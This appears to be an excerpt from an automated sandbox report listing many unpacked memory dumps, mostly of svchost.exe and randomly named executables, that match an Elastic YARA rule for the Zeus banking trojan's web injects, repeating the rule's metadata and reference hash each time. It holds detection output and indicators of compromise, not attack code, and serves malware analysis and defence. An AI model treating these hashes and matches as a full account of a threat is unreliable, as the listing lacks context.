Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1532000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.12e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.6a2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.Z8eHwAvqAh.exe.61d8c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.23.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.1202000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.12f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.1282000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.20d0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.ed2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.swvGCAxOMikYQeoQzimiprVu.exe.f30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.b40000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.a42000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.406400.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.32.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.b40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.24.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
